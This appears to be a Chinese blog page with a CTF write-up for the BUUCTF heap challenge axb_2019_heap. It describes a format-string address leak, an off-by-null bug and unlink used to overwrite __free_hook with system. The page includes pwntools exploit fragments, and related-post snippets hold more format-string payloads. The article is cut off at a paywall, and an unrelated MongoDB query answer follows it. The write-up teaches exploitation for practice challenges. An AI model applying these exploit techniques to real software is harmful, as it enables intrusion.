Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)

最新推荐文章于 2024-02-20 00:57:52 发布
原创 最新推荐文章于 2024-02-20 00:57:52 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn

本文介绍Buuctf中axb_2019_heap挑战的解决方法,通过格式化字符串漏洞获取基地址,利用unlink技巧修改heap chunk,最终实现getshell。详细步骤包括:1. 利用格式化字符串漏洞泄露地址;2. 通过unlink技巧修改free_hook为system函数地址。

Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)

例行检查在这里插入图片描述

64位,保护机制全开,IDA中分析

漏洞分析

在这里插入图片描述
此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块

利用思路

1.利用格式化字符串漏洞泄露出程序基地址和libc基地址
2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为system地址
3.free掉chunk中为’/bin/sh’的堆块,get shell.

分析

1.经过调试可以看到%14$p%$15p的位置上分别是程序地址和libc中的地址,通过格式化字符串漏洞泄露出来
在这里插入图片描述
算出free_hook地址和system地址

io.recvuntil(':')
io.sendline('%14$p%15$p')
io.recvuntil('Hello, 0x')
elf = int(io.recv(12),16)
elf_base = elf - 0x1200
io.recvuntil('0x')
leak = int(io.recv(12),16)
libc_base = leak - 0x20840
success(hex(elf_base))
success(hex(libc_base))
note = elf_base + 0x202060
success(hex(note))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

success(hex(free_hook)
最低0.47元/天 解锁文章
buuctf axb_2019_heap
weixin_45677731的博客
09-23 1732
拖进IDA之后,发现输入函数是存在off-by-one漏洞的,可以进行溢出 同时存在全局指针数组,就可以利用这个溢出来构造fake chunk,然后实现unlink 除此之外,这个程序malloc的大小是不能小于0x80的,额。。。其实这个不重要,问题不大,注意下就好了 但是,程序的保护全都开启了 也就是说,程序的地址是随机的,我们并不知道chunk指针的存放地址 如何泄露呢?这时还发现程序开头存在格式化字符串的漏洞 打开调试,输入8个a,在printf(&format)这里停一下,然后看下栈
[BUUCTF]PWN——axb_2019_heap(格式化字符串off-by-one,unlink)
mcmuyanga的博客
01-26 1003
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlinkoff by one)
2301_79326813的博客
02-20 629
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
BUUCTF【PicoCTF_2018_echo_back】(格式化字符串)
weixin_51055545的博客
04-26 522
文章目录PicoCTF_2018_echo_back例行检查:IDA分析:exp: PicoCTF_2018_echo_back 例行检查: 开了部分relro,没开pie, IDA分析: 函数主逻辑在vul()函数中: 先打印出一句话,然后让我们输入,大小控制在0x7f,然后很明显一个格式化字符串,然后下边直接puts完后,程序结束. 程序中存在system,并且没开pie,这里我们考虑直接got表,我选择的是printf()_got为system_plt,下边程序直接结束了,这里我们没办法去输入
axb_2019_heap
doudoudedi
02-05 1002
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串got表)
mcmuyanga的博客
01-27 3287
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
[第五空间2019 决赛]PWN5-BUUCTF-格式化字符串
yuqie的博客
07-07 412
第一眼就看到了'system',看一下条件,这里的atoi函数指的是把字符串转换成整数,而'nptr'就是输入的'passwd',再看看另外一个'dword_804C044'表示这个'0x804C044'地址,那意思就是如果输入的'passwd'的值与'dword_804C044'相等就行了,那就写一下'0x804C044'的值。'指向的内存位置中。这个表示从上面的文件中读取4个字节的字符,并将读取的数据存储到。有canary,栈溢出无望。数了一下,偏移量为10。
[BUUCTF]PWN——mrctf2020_easy_equation(格式化字符串
mcmuyanga的博客
01-28 1340
mrctf2020_easy_equation 附件 步骤 例行检查,64位程序,只开启了nx保护 本地试运行一下,看看大概的情况,%p,那边,明显的格式化字符串漏洞 64位ida载入 只要满足第8行的条件即可获取shell,python算一下得到结果是2 所以这题是用格式化字符串漏洞,将judge上的值修称即可 利用过程 确定偏移量,补了一个b之后偏移是8 由于64位传参,肯定存在被/x00截断的情况,所以我动调看了一下 我们要做的是将judge里的值修成2,一开始我是这样写的,pa
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串
qq_73149934的博客
12-10 991
BUUCTF--pwn--[第五空间2019 决赛]PWN5
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
半岛铁盒的博客
08-05 522
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import * r=remote('node3.buuoj.cn',25582) x_addr=0x804A02C payload=p32(x_addr)+"%11$n" r.sendline(payload) r.interactive() payload=p32(x_addr)+"%11$n" 因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2372
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
buuctf pwn wp(第四波)格式化字符串漏洞系列
月阴荒的博客
04-04 3430
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的...
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 938
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 2237
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
axb_2019_heap详解
像初雪一样自由洒落
04-25 775
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
axb_2019_heap【write up】
m0_73756460的博客
04-08 167
buu刷题 axb_2019_heap【write up】
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 2055
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
最新发布
03-13
### 将JSON结构转换为MongoDB查询语句 要将给定的JSON结构转换为MongoDB查询语句,可以按照以下方式构建查询: #### 查询语句 假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } } ``` 完整的MongoDB查询语句可以通过 `db.collection.find()` 方法实现: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.find({ "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } }); ``` 此查询表示筛选出集合 `AXB_MTWM_CALL_FINISH_RECORD_INFO` 中满足以下两个条件的文档: 1. 字段 `result` 的值等于 `"0"`[^1]。 2. 字段 `baselineTime` 的值大于或等于 `ISODate("2025-01-28T00:00:00Z")` 并小于 `ISODate("2025-01-29T00:00:00Z")`[^2]。 如果需要进一步优化性能,可以在 `result` 和 `baselineTime` 上创建复合索引来加速查询操作。例如: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.createIndex({ result: 1, baselineTime: 1 }); ``` 这一步骤有助于提高查询效率,尤其是在处理大规模数据集时[^3]。 #### Java 实现示例 以下是基于 Java 驱动程序执行上述查询的一个示例代码片段: ```java import com.mongodb.client.MongoClients; import com.mongodb.client.MongoCollection; import com.mongodb.client.MongoDatabase; import org.bson.Document; public class MongoDBQueryExample { public static void main(String[] args) { try (var mongoClient = MongoClients.create("mongodb://localhost:27017")) { var database = mongoClient.getDatabase("your_database_name"); var collection = database.getCollection("AXB_MTWM_CALL_FINISH_RECORD_INFO"); Document query = new Document("result", "0") .append("baselineTime", new Document("$gte", java.time.Instant.parse("2025-01-28T00:00:00Z")) .append("$lt", java.time.Instant.parse("2025-01-29T00:00:00Z"))); collection.find(query).forEach(doc -> System.out.println(doc.toJson())); } } } ``` 这段代码展示了如何通过 Java API 构建并运行指定的查询逻辑[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值